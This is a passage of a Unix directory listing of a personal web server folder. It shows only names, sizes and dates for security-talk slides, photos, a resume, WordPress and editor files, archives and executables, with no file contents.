DMK_BO2K8_BHFed.ppt -rwxr-xr-x 1 effugas effugas 2143744 Jan 20 11:35 DMK_BO2K8_CCC.ppt lrwxr-xr-x 1 effugas effugas 17 Feb 20 09:13 DMK_Neut_Toor.ppt -> DMK_Neut_toor.ppt -rwxrwxrwx 1 effugas effugas 3241984 Jul 28 2008 DMK_Neut_toor.ppt -rw-r--r-- 1 effugas effugas 2270768 Dec 25 2004 DSC01568.JPG -rwxr-xr-x 1 effugas effugas 53139 Feb 16 2006 DanK_VBFeb06.pdf -rw-r--r-- 1 effugas effugas 37553 Nov 13 2002 Dan_Kaminsky_Resume.pdf -rw-r--r-- 1 effugas effugas 10801 Feb 11 2001 Dan_Pic.jpg -rw-r--r-- 1 effugas effugas 34934 Feb 11 2001 Denial_camoback.jpg -rw-r--r-- 1 effugas effugas 36755 Feb 11 2001 Depression_camoback.jpg drwxr-xr-x 4 effugas effugas 512 Aug 19 2008 Diff -rw-r--r-- 1 effugas effugas 11028 Apr 18 2008 Diff.php -rw-r--r-- 1 effugas effugas 29836 Feb 11 2001 DoxSTAR_Logo.jpg -rw-r--r-- 1 effugas effugas 31977 Feb 11 2001 DoxSTAR_New_Logo.jpg drwxr-xr-x 2 effugas effugas 512 Aug 19 2008 Engine -rw-r--r-- 1 effugas effugas 51619 Sep 23 2005 Frontpage -rw-r--r-- 1 effugas effugas 40411 Apr 12 2005 Frontpage_backup -rw-r--r-- 1 effugas effugas 26280 Nov 14 2002 Frontpage_old -rw-r--r-- 1 effugas effugas 15364 Dec 24 2002 Frontpage_orig -rw-r--r-- 1 effugas effugas 1016 Nov 14 2002 Frontpage~ -rw-r--r-- 1 effugas effugas 4099 Mar 3 2008 GoogleSpell.php -rw-r--r-- 1 effugas effugas 959731 Sep 15 2003 IMGP1778.JPG -rw-r--r-- 1 effugas effugas 1001186 Sep 26 2003 IMGP1807.JPG -rw-r--r-- 1 effugas effugas 663074 Jul 22 2004 IMGP2357.JPG -rw-r--r-- 1 effugas effugas 658676 Jul 22 2004 IMGP2358.JPG -rw-r--r-- 1 effugas effugas 657209 Jul 22 2004 IMGP2360.JPG -rw-r--r-- 1 effugas effugas 10280 Apr 22 2005 INSTALL.txt -rw-r--r-- 1 effugas effugas 37027 Feb 11 2001 Introduction_camoback.jpg -rw-r--r-- 1 effugas effugas 11877 Jan 17 2008 JSON.php -rw-r--r-- 1 effugas effugas 18019 Sep 15 2004 LICENSE.txt -rw-r--r-- 1 effugas effugas 237080 Sep 25 2003 Library.array -rw-r--r-- 1 effugas effugas 5465 Jan 17 2008 Logger.php -rw-r--r-- 1 effugas effugas 1428 Sep 15 2004 MAINTAINERS.txt -rw-r--r-- 1 effugas effugas 1125 Mar 2 2008 MIT-LICENSE -rw-r--r-- 1 effugas effugas 1900 Jan 17 2008 PSpell.php -rw-r--r-- 1 effugas effugas 2810 Jan 17 2008 PSpellShell.php -rw-r--r-- 1 effugas effugas 2428600 Nov 14 2002 Publ.2000.5.pdf -rw-r--r-- 1 effugas effugas 27914818 Nov 14 2002 Publ.2002.3.pdf drwxr-xr-x 2 effugas effugas 512 Aug 19 2008 Renderer -rw-r--r-- 1 effugas effugas 6782 Apr 18 2008 Renderer.php -rw-r--r-- 1 effugas effugas 253440 Jul 30 2003 SBO.ppt -rwxr-xr-x 1 effugas effugas 302592 Oct 1 2003 SBO_Fed.ppt -rw-r--r-- 1 effugas effugas 461312 Sep 19 2003 SBO_Fed_Prerelease.ppt -rw-r--r-- 1 effugas effugas 634880 Nov 12 2003 SBO_Hiver.ppt -rw-r--r-- 1 effugas effugas 175847 Mar 26 2007 SharkReefScaredPic.jpg -rw-r--r-- 1 effugas effugas 423577 Mar 26 2007 SharkReefVegasPic.jpg -rw-r--r-- 1 effugas effugas 2305 Jul 13 2005 Sidebar -rw-r--r-- 1 effugas effugas 0 Dec 29 2004 Sidebar~ -rw-r--r-- 1 effugas effugas 29566 Feb 11 2001 Silc2.jpg -rw-r--r-- 1 effugas effugas 36390 Feb 11 2001 Sociology_camoback.jpg -rw-r--r-- 1 effugas effugas 1486 Feb 4 2008 SpellChecker.php -rwxrwxrwx 1 effugas effugas 206336 Mar 9 16:45 Staring Into The Abyss.doc -rwxrwxrwx 1 effugas effugas 204187 Mar 9 16:45 Staring Into The Abyss.pdf -rw-r--r-- 1 effugas effugas 79 Nov 14 2002 StringBuf.html drwxr-xr-x 3 effugas effugas 512 Jul 15 2008 Text -rw-r--r-- 1 effugas effugas 2633059 Sep 7 2006 Title_01.txt.png -rw-r--r-- 1 effugas effugas 951434 Jun 10 2002 Unwind.mov -rw-r--r-- 1 effugas effugas 2622 Nov 14 2002 ] -rw-r--r-- 1 effugas effugas 84604 Feb 11 2001 a_DoxSTAR_Logo.jpg -rw-r--r-- 1 effugas effugas 2943 Jun 27 2008 about.htm -rw-r--r-- 1 effugas effugas 2059 Feb 25 2008 about.js drwxr-xr-x 2 effugas effugas 512 Mar 9 12:26 abyss -rw-r--r-- 1 effugas effugas 37527 Nov 14 2002 act.html -rw-r--r-- 1 effugas effugas 157 Jul 1 2001 adddrop.gif -rw-r--r-- 1 effugas effugas 139 Jul 1 2001 addext.gif -rw-r--r-- 1 effugas effugas 1184 Jul 1 2001 addfull.gif -rw-r--r-- 1 effugas effugas 262 Jul 1 2001 addgo.gif -rw-r--r-- 1 effugas effugas 228 Jul 1 2001 addleft.gif -rw-r--r-- 1 effugas effugas 216 Jul 1 2001 addlinks.gif -rw-r--r-- 1 effugas effugas 562 Jul 1 2001 addmidd.gif -rw-r--r-- 1 effugas effugas 401 Jul 1 2001 addright.gif -rw-r--r-- 1 effugas effugas 91 Jul 1 2001 addspace.gif -rw-r--r-- 1 effugas effugas 18030 Jul 8 2008 admin-ajax.php -rw-r--r-- 1 effugas effugas 571 Feb 29 2008 admin-footer.php -rw-r--r-- 1 effugas effugas 182 Mar 21 2008 admin-functions.php -rw-r--r-- 1 effugas effugas 6447 Jul 3 2008 admin-header.php -rw-r--r-- 1 effugas effugas 432 Jul 11 2008 admin-post.php -rw-r--r-- 1 effugas effugas 845 Apr 14 2008 admin.php drwxr-xr-x 5 effugas effugas 512 Aug 19 2008 advanced -rw-r--r-- 1 effugas effugas 242613 Feb 2 2004 agenda.pdf drwxr-xr-x 2 effugas effugas 512 Aug 19 2008 akismet -rw-r--r-- 1 effugas effugas 2777 Aug 23 2006 akismet.gif -rw-r--r-- 1 effugas effugas 33730 Jul 1 2008 akismet.php -rw-r--r-- 1 effugas effugas 818 Jan 17 2008 alert.gif -rw-r--r-- 1 effugas effugas 571 Jan 9 2008 align-center.png -rw-r--r-- 1 effugas effugas 587 Jan 9 2008 align-left.png -rw-r--r-- 1 effugas effugas 453 Jan 9 2008 align-none.png -rw-r--r-- 1 effugas effugas 556 Jan 9 2008 align-right.png -rw-r--r-- 1 effugas effugas 1126 Jun 27 2008 anchor.htm -rw-r--r-- 1 effugas effugas 1029 Mar 25 2008 anchor.js drwxr-xr-x 2 effugas effugas 1536 Sep 14 2003 angel -rw-r--r-- 1 effugas effugas 0 Apr 26 2005 ani -rw-r--r-- 1 effugas effugas 91140 Feb 20 2005 ani.jpg lrwxr-xr-x 1 effugas effugas 5 Jul 30 2003 apps -> apps2 drwxr-xr-x 25 effugas effugas 512 Aug 15 2004 apps2 -rw-r--r-- 1 effugas effugas 1561824 Aug 20 2006 ar32_color_partial.png -rw-r--r-- 1 effugas effugas 2436 Feb 20 2008 archive.php -rw-r--r-- 1 effugas effugas 3066 Feb 28 2008 archive.png -rw-r--r-- 1 effugas effugas 352 Nov 18 2006 archives.php -rw-r--r-- 1 effugas effugas 8502243 Jun 16 2005 arm1.zip -rwxr-xr-x 1 effugas effugas 91136 Nov 14 2002 ass10.txt -rw-r--r-- 1 effugas effugas 1416 Jun 24 2008 async-upload.php -rw-r--r-- 1 effugas effugas 175 Feb 3 2006 at5.html -rw-r--r-- 1 effugas effugas 10928 Jun 20 2008 atomlib.php -rw-r--r-- 1 effugas effugas 430 Dec 24 2005 attack.html -rw-r--r-- 1 effugas effugas 180 Dec 24 2005 attack2.html -rw-r--r-- 1 effugas effugas 200604 Mar 24 2003 au8820.o -rw-r--r-- 1 effugas effugas 146 Jul 3 2008 audio.gif -rw-r--r-- 1 effugas effugas 4671 Dec 13 2005 audio.jpg -rw-r--r-- 1 effugas effugas 2647 Feb 28 2008 audio.png -rw-r--r-- 1 effugas effugas 36130 Apr 24 2007 audiodot.jpg -rw-r--r-- 1 effugas effugas 14171 Jun 20 2008 author-template.php drwxr-xr-x 2 effugas effugas 512 Aug 19 2008 autosave -rw-r--r-- 1 effugas effugas 8131 Jun 23 2008 autosave.js -rw-r--r-- 1 effugas effugas 8048 Jan 23 2006 av2.txt -rwxr-xr-x 1 effugas effugas 10600 Jan 25 2006 av4.html -rwx------ 1 effugas effugas 10381 Jan 25 2006 av4.txt -rw-r--r-- 1 effugas effugas 5661 Jan 22 2006 av_pre.html -rw-r--r-- 1 effugas effugas 5502 Jan 22 2006 av_pre.txt -rw-r--r-- 1 effugas effugas 47957 Dec 10 2004 avaya.js -rw-r--r-- 1 effugas effugas 59756 Sep 23 2001 awpladin.jpg -rw-r--r-- 1 effugas effugas 9043618 Apr 11 2005 b-ball-e-mail.mov -rw-r--r-- 1 effugas effugas 20403 Sep 11 2005 b151_alpha.tgz -rwxrwxrwx 1 effugas effugas 90306 Feb 11 15:20 badidea.jpg -rwxrwxrwx 1 effugas effugas 69977 Feb 11 15:20 badidea.png drwxr-xr-x 2 effugas effugas 10240 Dec 21 2006 bait2 -rw-r--r-- 1 effugas effugas 36613 Oct 29 2006 bam.jpg -rw-r--r-- 1 effugas effugas 1275 May 28 2004 base64.tgz -rw-r--r-- 1 effugas effugas 14760218 Apr 28 2005 basic_opte.dump -rw-r--r-- 1 effugas effugas 3512300 Apr 28 2005 basic_opte.zip -rw-r--r-- 1 effugas effugas 34713 Oct 6 2003 bathroom1.jpg -rw-r--r-- 1 effugas effugas 30767 Oct 6 2003 bathroom2.jpg -rw-r--r-- 1 effugas effugas 37078 Oct 6 2003 bathroom3.jpg -rw-r--r-- 1 effugas effugas 36704 Sep 7 2001 bboym.jpg -rwxr-xr-x 1 effugas effugas 64 Feb 2 2006 bgat.html -rw-r--r-- 1 effugas effugas 2668661 Sep 20 2003 bigtrace_foo.txt.gz -rw-r--r-- 1 effugas effugas 512200 Sep 20 2003 bigtrace_ordered.txt.gz -rw-r--r-- 1 effugas effugas 2456 Jan 17 1999 bjt.gif -rw-r--r-- 1 effugas effugas 3896 Mar 11 2001 bjt.jpg -rw-r--r-- 1 effugas effugas 7480 Jul 1 2004 black_ops_of_dns.txt -rw-r--r-- 1 effugas effugas 395 Jan 17 2008 blank.css -rw-r--r-- 1 effugas effugas 43 May 4 2008 blank.gif -rw-r--r-- 1 effugas effugas 204 Jan 6 2008 blank.htm -rw-r--r-- 1 effugas effugas 36963 Apr 16 2008 blogger.php -rw-r--r-- 1 effugas effugas 6264 Feb 29 2008 blogware.php -rwxr-xr-x 1 effugas effugas 3145 Sep 5 2007 blue1.png -rwxr-xr-x 1 effugas effugas 15962 Aug 15 2005 blue_double_cross.swf -rw-r--r-- 1 effugas effugas 1021215 Jun 21 2004 bo2004.pdf -rw-r--r-- 1 effugas effugas 483840 Jun 13 2004 bo2004.ppt -rw-r--r-- 1 effugas effugas 4300 Feb 13 2005 boe2.html -rwxr-xr-x 1 effugas effugas 810 Feb 5 2005 boeing.html -rw-r--r-- 1 effugas effugas 7090 Feb 5 2005 boeing.js -rw-r--r-- 1 effugas effugas 8948 Jun 24 2008 bookmark-template.php -rw-r--r-- 1 effugas effugas 4818 Apr 15 2008 bookmark.php -rw-r--r-- 1 effugas effugas 409 Nov 14 2002 bottom.html -rw-r--r-- 1 effugas effugas 365 Nov 14 2002 bottom_ie.html -rw-r--r-- 1 effugas effugas 2142026 Dec 17 2006 bouncy.avi -rw-r--r-- 1 effugas effugas 4398 Aug 27 2005 browse-happy.gif -rw-r--r-- 1 effugas effugas 3473 Feb 27 2008 btt.php -rw-r--r-- 1 effugas effugas 395 Mar 22 2008 bubble_bg.gif -rw-r--r-- 1 effugas effugas 4770 Mar 2 2008 builder.js -rw-r--r-- 1 effugas effugas 280 Jan 17 2008 button.gif -rw-r--r-- 1 effugas effugas 989 Jan 31 2008 buttons.gif -rw-r--r-- 1 effugas effugas 3274 Jan 17 2008 buttons.png -rwxr-xr-x 1 effugas effugas 559 Mar 23 2003 bwmon.sh -rw-r--r-- 1 effugas effugas 11872 May 25 2008 cache.php -rw-r--r-- 1 effugas effugas 488058 Dec 1 2006 cacm_kaminsky.pdf -rw-r--r-- 1 effugas effugas 71 Nov 14 2002 cal.html -rw-r--r-- 1 effugas effugas 1832402 Aug 30 2001 cal_rasterbation.jpg -rw-r--r-- 1 effugas effugas 129974 Aug 30 2001 cal_rasterbation_small.jpg -rwxr--r-- 1 effugas effugas 1106567 Jan 1 2003 call.wm_ -rw-r--r-- 1 effugas effugas 9744 May 25 2008 canonical.php -rw-r--r-- 1 effugas effugas 12732 Apr 16 2008 capabilities.php -rw-r--r-- 1 effugas effugas 146988 May 15 2007 carpenter.jpg -rw-r--r-- 1 effugas effugas 556 Oct 31 2007 cat.js -rw-r--r-- 1 effugas effugas 658 Mar 2 2008 categories.js -rw-r--r-- 1 effugas effugas 5473 Jun 13 2008 categories.php -rw-r--r-- 1 effugas effugas 16490 Jul 8 2008 category-template.php -rw-r--r-- 1 effugas effugas 11341 Jun 15 2008 category.php -rw-r--r-- 1 effugas effugas 36340 Jun 29 2005 caution.gif -rw-r--r-- 1 effugas effugas 362496 Sep 30 2005 cc.doc -rw-r--r-- 1 effugas effugas 2812509 Feb 6 2006 cdcygssh.cab -rw-r--r-- 1 effugas effugas 25 Feb 6 2006 cdl.html -rw-r--r-- 1 effugas effugas 41 Jun 1 02:21 cert.htm -rw-r--r-- 1 effugas effugas 0 Jun 1 02:21 cert.html -rw-r--r-- 1 effugas effugas 309643 Jan 22 2002 ch12.pdf -rw-r--r-- 1 effugas effugas 469968 Jan 22 2002 ch13.pdf -rw-r--r-- 1 effugas effugas 2398 Jun 27 2008 charmap.htm -rw-r--r-- 1 effugas effugas 14515 Feb 21 2008 charmap.js -rwxr-xr-x 1 effugas effugas 95232 Sep 3 2006 chkreg.exe -rw-r--r-- 1 effugas effugas 28130 Jun 14 2008 class-IXR.php -rw-r--r-- 1 effugas effugas 5154 Mar 11 2008 class-ftp-pure.php -rw-r--r-- 1 effugas effugas 8223 Mar 11 2008 class-ftp-sockets.php -rw-r--r-- 1 effugas effugas 25912 Mar 16 2008 class-ftp.php -rw-r--r-- 1 effugas effugas 243102 Mar 15 2008 class-pclzip.php -rw-r--r-- 1 effugas effugas 6807 Jun 14 2008 class-phpass.php -rw-r--r-- 1 effugas effugas 44998 Jun 14 2008 class-phpmailer.php -rw-r--r-- 1 effugas effugas 20667 Jun 14 2008 class-pop3.php -rw-r--r-- 1 effugas effugas 33419 Jun 24 2008 class-smtp.php -rw-r--r-- 1 effugas effugas 37889 Jun 14 2008 class-snoopy.php -rw-r--r-- 1 effugas effugas 5307 Jul 3 2008 class-wp-filesystem-base.php -rw-r--r-- 1 effugas effugas 6558 May 30 2008 class-wp-filesystem-direct.php -rw-r--r-- 1 effugas effugas 10411 May 29 2008 class-wp-filesystem-ftpext.php -rw-r--r-- 1 effugas effugas 7820 May 30 2008 class-wp-filesystem-ftpsockets.php -rw-r--r-- 1 effugas effugas 5480 May 20 2008 class.wp-dependencies.php -rw-r--r-- 1 effugas effugas 2673 Jul 9 2008 class.wp-scripts.php -rw-r--r-- 1 effugas effugas 2369 Jul 9 2008 class.wp-styles.php drwxr-xr-x 3 effugas effugas 512 Aug 19 2008 classes -rw-r--r-- 1 effugas effugas 24824 Jul 6 2008 classes.php drwxr-xr-x 2 effugas effugas 512 Jul 15 2008 classic -rw-r--r-- 1 effugas effugas 4082 Oct 26 2004 classy.cpp -rw-r--r-- 1 effugas effugas 151 Feb 11 2001 clearbar.gif drwxr-xr-x 3 effugas effugas 512 Aug 19 2008 clearlooks2 -rw-r--r-- 1 effugas effugas 43 Feb 11 2001 clearpixel.gif -rw-r--r-- 1 effugas effugas 69121 Sep 23 2002 cleartype.jpg -rw-r--r-- 1 effugas effugas 37749 Nov 14 2002 cleartype.png -rw-r--r-- 1 effugas effugas 289792 Apr 16 2006 cmd.exe -rw-r--r-- 1 effugas effugas 4107 Jul 20 2004 cnet.xml drwxrwxrwx 2 effugas effugas 512 Oct 17 2005 code -rw-r--r-- 1 effugas effugas 2133 Feb 28 2008 code.png drwxr-xr-x 2 effugas effugas 512 Dec 19 2002 collab drwx------ 2 effugas effugas 1024 Jul 15 2003 collection -rw-r--r-- 1 effugas effugas 2875 Jun 27 2008 color_picker.htm -rw-r--r-- 1 effugas effugas 11017 Jun 4 2008 color_picker.js -rwxr-xr-x 1 effugas effugas 907 Sep 5 2007 colorcode.css -rw-r--r-- 1 effugas effugas 3189 Jan 17 2008 colorpicker.jpg -rw-r--r-- 1 effugas effugas 29114 Feb 29 2008 colorpicker.js -rw-r--r-- 1 effugas effugas 116 Mar 22 2008 colors-classic-rtl.css -rw-r--r-- 1 effugas effugas 14048 Jul 10 2008 colors-classic.css -rw-r--r-- 1 effugas effugas 116 Mar 19 2008 colors-fresh-rtl.css -rw-r--r-- 1 effugas effugas 13843 Jul 10 2008 colors-fresh.css -rw-r--r-- 1 effugas effugas 158 Feb 10 2008 comment-grey-bubble.png -rw-r--r-- 1 effugas effugas 72 Dec 22 2007 comment-pill.gif -rw-r--r-- 1 effugas effugas 1100 Mar 11 2008 comment-stalk-classic.gif -rw-r--r-- 1 effugas effugas 1067 Mar 11 2008 comment-stalk-fresh.gif -rw-r--r-- 1 effugas effugas 1064 Mar 19 2008 comment-stalk-rtl.gif -rw-r--r-- 1 effugas effugas 23887 Jun 22 2008 comment-template.php -rw-r--r-- 1 effugas effugas 897 Mar 26 2008 comment.js -rw-r--r-- 1 effugas effugas 3384 Apr 22 2008 comment.php -rw-r--r-- 1 effugas effugas 5062 Mar 21 2008 comments-popup.php -rw-r--r-- 1 effugas effugas 3495 Mar 17 2008 comments.php -rw-r--r-- 1 effugas effugas 1286 Mar 18 2008 common.js -rw-r--r-- 1 effugas effugas 2693 Mar 3 2008 compat.php -rw-r--r-- 1 effugas effugas 637 Jan 17 2008 config.php -rw-r--r-- 1 effugas effugas 915 Jan 17 2008 confirm.gif -rwxr-xr-x 1 effugas effugas 4940 Sep 23 2005 confoo.pl -rw-r--r-- 1 effugas effugas 314 Jan 31 2008 content.css -rw-r--r-- 1 effugas effugas 34927 Mar 2 2008 controls.js -rw-r--r-- 1 effugas effugas 9215 Jul 22 2001 cornell.jpg -rw-r--r-- 1 effugas effugas 911 Jan 17 2008 corners.gif -rw-r--r-- 1 effugas effugas 161371 Sep 22 2003 county2.sql -rw-r--r-- 1 effugas effugas 7119 Aug 23 2005 cred.zip -rw-r--r-- 1 effugas effugas 3097 Nov 14 2002 crit.txt -rw-r--r-- 1 effugas effugas 5099 Aug 29 2007 cron.php drwxr-xr-x 2 effugas effugas 512 Jul 15 2008 crop -rw-r--r-- 1 effugas effugas 2950 Mar 2 2008 cropper.css -rw-r--r-- 1 effugas effugas 16485 May 4 2007 cropper.js drwxr-xr-x 2 effugas effugas 512 Jul 15 2008 crystal drwxr-xr-x 2 effugas effugas 1024 Jul 15 2008 css -rw-r--r-- 1 effugas effugas 533 Feb 21 2008 css.png -rw-r--r-- 1 effugas effugas 968 Mar 2 2008 custom-fields.js -rw-r--r-- 1 effugas effugas 11684 May 27 2008 custom-header.php -rw-r--r-- 1 effugas effugas 25846 Feb 11 2001 dan1.jpg -rw-r--r-- 1 effugas effugas 30054 Feb 11 2001 dan2.jpg -rw-r--r-- 1 effugas effugas 59055 Sep 15 2003 dan_and_sally.jpg -rw-r--r-- 1 effugas effugas 723975 Jun 28 2004 dan_at_l1.jpg -rw-r--r-- 1 effugas effugas 842526 Jun 28 2004 dan_at_l1_2.jpg -rw-r--r-- 1 effugas effugas 37749 Aug 10 2003 dan_sarah.jpg -rwxrwxrwx 1 effugas effugas 39961 Jul 19 2008 danjaybeale.png -rw-r--r-- 1 effugas effugas 1435 Jul 13 2008 dashboard-rtl.css -rw-r--r-- 1 effugas effugas 4793 Mar 21 2008 dashboard.css -rw-r--r-- 1 effugas effugas 22311 Jun 20 2008 dashboard.php drwxr-sr-x 2 effugas effugas 512 Oct 17 2005 database -rw-r--r-- 1 effugas effugas 111 Mar 14 2008 date-button.gif -rwxr-xr-x 1 effugas effugas 2420 Nov 14 2002 david.txt -rw-r--r-- 1 effugas effugas 2105488 Jan 29 2007 ddop-0.1.zip -rw-r--r-- 1 effugas effugas 2105664 Jan 31 2007 ddop-0.2.zip -rw-r--r-- 1 effugas effugas 2105999 Feb 3 2007 ddop-0.3.zip drwxr-xr-x 3 effugas effugas 512 Jul 15 2008 default -rw-r--r-- 1 effugas effugas 6896 Jun 29 2008 default-filters.php -rw-r--r-- 1 effugas effugas 479 Feb 21 2008 default.png -rw-r--r-- 1 effugas effugas 1638 Jun 9 2008 delete.png -rwxr-xr-x 1 effugas effugas 751304 Mar 26 2003 demo9.exe -rw-r--r-- 1 effugas effugas 37548 Jul 8 2008 deprecated.php drwxr-xr-x 2 effugas effugas 512 Aug 7 2003 dev -rw-r--r-- 1 effugas effugas 5421 Feb 21 2008 dialog.css -rw-r--r-- 1 effugas effugas 422438 Jan 26 2006 diff.html -rw-r--r-- 1 effugas effugas 408043 May 15 11:32 diffiegrandma.jpg -rwx------ 1 effugas effugas 140 Jan 22 2007 direct.html drwxr-xr-x 2 effugas effugas 512 Aug 19 2008 directionality -rw-r--r-- 1 effugas effugas 534851 Jan 16 2006 dll_func0.PNG -rw-r--r-- 1 effugas effugas 20140 Oct 22 2001 dmk.jpg -rwxr-xr-x 1 effugas effugas 263415 Oct 3 2001 dmk1_full.jpg -rwxr-xr-x 1 effugas effugas 346549 Oct 3 2001 dmk2_full.jpg -rw-r--r-- 1 effugas effugas 13224448 Jun 27 2007 dmk_audioviz.ppt -rw-r--r-- 1 effugas effugas 11904275 Aug 9 2006 dmk_bbc_raul.mp3 -rw-r--r-- 1 effugas effugas 9568256 Aug 3 2006 dmk_blackops2006.ppt -rw-r--r-- 1 effugas effugas 8652746 Nov 28 2006 dmk_bo2006_toor.pdf -rw-r--r-- 1 effugas effugas 7104740 Aug 8 2006 dmk_bo2k6.pdf -rw-r--r-- 1 effugas effugas 10059264 Apr 28 2007 dmk_shmoo2007.ppt -rw-r--r-- 1 effugas effugas 94945 Aug 10 2004 dn_atmouse.jpg -rw-r--r-- 1 effugas effugas 140292 Aug 10 2004 dn_atpier.jpg drwxr-xr-x 2 effugas effugas 512 Dec 20 2004 dna drwxrwxrwx 3 effugas effugas 512 Jun 21 2004 dns -rw-r--r-- 1 effugas effugas 106496 Jun 29 2004 dns.log drwxr-xr-x 4 effugas effugas 512 Aug 1 2004 dns_bh -rw-r--r-- 1 effugas effugas 507548 Nov 7 2004 dns_coords.zip drwxr-xr-x 2 effugas effugas 512 Sep 16 2004 dns_fast -rw-r--r-- 1 effugas effugas 82026 Jun 29 2004 dns_scan_1.jpg -rw-r--r-- 1 effugas effugas 74457 Jun 29 2004 dns_scan_2.jpg drwxr-xr-x 3 effugas effugas 512 Sep 30 2004 dns_tc -rw-r--r-- 1 effugas effugas 1116160 Jun 21 2004 dnsstuff.tar -rw-r--r-- 1 effugas effugas 1535 Feb 21 2008 doc.png -rw-r--r-- 1 effugas effugas 2305 Feb 28 2008 document.png drwxr-xr-x 2 effugas effugas 512 Jul 31 2007 dolphin -rw-r--r-- 1 effugas effugas 2173 Sep 3 2004 dormant-0.1.tar.gz -rw-r--r-- 1 effugas effugas 2393 Sep 3 2004 dormant-0.11.tar.gz -rw-r--r-- 1 effugas effugas 23211 Apr 14 2008 dotclear.php -rwxr-xr-x 1 effugas effugas 399 Feb 1 2006 downlevel.html -rw-r--r-- 1 effugas effugas 0 Jun 1 02:21 downloader.do?c=115814&d=dvp -rw-r--r-- 1 effugas effugas 5692 Feb 11 2001 doxpara_bw_rs.gif drwxr-xr-x 2 effugas effugas 512 Oct 17 2005 dr -rw-r--r-- 1 effugas effugas 57 Jan 31 2008 drag.gif -rw-r--r-- 1 effugas effugas 31605 Mar 2 2008 dragdrop.js drwxr-sr-x 9 effugas effugas 512 Aug 14 2005 drupal-4.6.3 -rw-r--r-- 1 effugas effugas 458095 Aug 14 2005 drupal-4.6.3.tar.gz drwxr-sr-x 9 effugas effugas 512 Nov 24 2007 drupal-5.3 -rwxr-xr-x 1 effugas effugas 1754439 Sep 16 2005 dsimplex.exe -rw-r--r-- 1 effugas effugas 10611 Nov 14 2002 dvd.txt -rw-r--r-- 1 effugas effugas 150788 Sep 2 2004 dxp.tgz -rwxr-xr-x 1 effugas effugas 1591 Jul 28 2004 dynup.pl -rw-r--r-- 1 effugas effugas 34813 Aug 29 2004 ebs_1.mp3 -rw-r--r-- 1 effugas effugas 34813 Aug 29 2004 ebs_2.mp3 -rw-r--r-- 1 effugas effugas 4244 Apr 25 2008 edit-attachment-rows.php -rw-r--r-- 1 effugas effugas 3064 Jun 16 2008 edit-category-form.php -rw-r--r-- 1 effugas effugas 2590 Mar 21 2008 edit-comments.js -rw-r--r-- 1 effugas effugas 8183 May 4 2008 edit-comments.php -rw-r--r-- 1 effugas effugas 18780 Jun 23 2008 edit-form-advanced.php -rw-r--r-- 1 effugas effugas 4445 May 4 2008 edit-form-comment.php -rw-r--r-- 1 effugas effugas 3115 Mar 15 2008 edit-form.php -rw-r--r-- 1 effugas effugas 4585 May 4 2008 edit-link-categories.php -rw-r--r-- 1 effugas effugas 2208 May 5 2008 edit-link-category-form.php -rw-r--r-- 1 effugas effugas 14940 May 30 2008 edit-link-form.php -rw-r--r-- 1 effugas effugas 14864 Jun 2 2008 edit-page-form.php -rw-r--r-- 1 effugas effugas 7316 Jun 14 2008 edit-pages.php -rw-r--r-- 1 effugas effugas 6040 Apr 22 2008 edit-post-rows.php -rw-r--r-- 1 effugas effugas 1908 May 5 2008 edit-tag-form.php -rw-r--r-- 1 effugas effugas 4913 May 4 2008 edit-tags.php -rw-r--r-- 1 effugas effugas 7944 May 27 2008 edit.php -rw-r--r-- 1 effugas effugas 1939 Jun 19 2008 editable_selects.js -rw-r--r-- 1 effugas effugas 906 Jun 23 2008 editimage-rtl.css -rw-r--r-- 1 effugas effugas 3654 Jul 8 2008 editimage.css -rw-r--r-- 1 effugas effugas 12161 Jul 11 2008 editimage.html -rw-r--r-- 1 effugas effugas 16793 Jul 11 2008 editimage.js -rw-r--r-- 1 effugas effugas 7622 Jul 11 2008 editor.js -rw-r--r-- 1 effugas effugas 1386 Jan 31 2008 editor_plugin.js -rw-r--r-- 1 effugas effugas 21855 Jun 4 2008 editor_template.js -rw-r--r-- 1 effugas effugas 38986 Mar 2 2008 effects.js -rw-r--r-- 1 effugas effugas 1865 Jan 17 2008 embed.js -rwxr-xr-x 1 effugas effugas 3199470 Feb 14 2005 emineire.mp3 -rw-r--r-- 1 effugas effugas 270 Dec 13 2004 engine.c -rwxr-xr-x 1 effugas effugas 491 Jan 29 2006 enum.html -rwxr-xr-x 1 effugas effugas 432 Jan 29 2006 enum.vbs -rw-r--r-- 1 effugas effugas 180161 Feb 19 2005 envelope.JPG -rw-r--r-- 1 effugas effugas 194 Feb 21 2008 exe.png -rw-r--r-- 1 effugas effugas 101554 Oct 12 2005 exerboxing.pdf -rw-r--r-- 1 effugas effugas 10060 May 20 2008 export.php drwxr-xr-x 4 effugas effugas 512 Oct 18 2004 expose -rw-r--r-- 1 effugas effugas 452914 Jun 17 2004 expose_v3014.zip -rw-r--r-- 1 effugas effugas 44 Mar 19 2005 f.html -rw-r--r-- 1 effugas effugas 2935 Nov 17 2005 f4ic_country.txt -rw-r--r-- 1 effugas effugas 785 Aug 27 2005 fade-butt.png -rw-r--r-- 1 effugas effugas 1064 Jul 9 2008 fake_index.php -rwxr-xr-x 1 effugas effugas 309 Sep 26 2005 fatal.txt -rw-r--r-- 1 effugas effugas 79 Nov 14 2002 fattest.html -rw-r--r-- 1 effugas effugas 3464 Feb 13 2008 feed-atom-comments.php -rw-r--r-- 1 effugas effugas 2431 Apr 22 2008 feed-atom.php -rw-r--r-- 1 effugas effugas 2084 Dec 25 2007 feed-rdf.php -rw-r--r-- 1 effugas effugas 1259 Dec 25 2007 feed-rss.php -rw-r--r-- 1 effugas effugas 2507 Mar 11 2008 feed-rss2-comments.php -rw-r--r-- 1 effugas effugas 2098 Mar 11 2008 feed-rss2.php -rw-r--r-- 1 effugas effugas 14425 Jul 3 2008 feed.php -rw-r--r-- 1 effugas effugas 16638 Jun 25 2008 file.php -rw-r--r-- 1 effugas effugas 1472486 Aug 21 2005 file_orig.pdf drwxr-xrwx 4 effugas effugas 512 Oct 29 2006 files -rw-r--r-- 1 effugas effugas 56 Jan 22 2006 filter.pl -rw-r--r-- 1 effugas effugas 2818 Feb 1 2004 finx.c -rw-r--r-- 1 effugas effugas 6094 Apr 29 2004 first.gif -rw-r--r-- 1 effugas effugas 173184 Mar 18 2005 fix.exe -rw-r--r-- 1 effugas effugas 184 Jul 20 2003 fix.txt -rw-r--r-- 1 effugas effugas 166681 Mar 19 2005 fix.zip -rw-r--r-- 1 effugas effugas 73236 Jun 24 2002 fix_step1.jpg -rw-r--r-- 1 effugas effugas 75382 Jun 24 2002 fix_step2.jpg -rw-r--r-- 1 effugas effugas 17956 Jul 8 2006 flags.png -rw-r--r-- 1 effugas effugas 241 Jan 17 2008 flash.gif -rw-r--r-- 1 effugas effugas 11668 Jan 17 2008 flv_player.swf 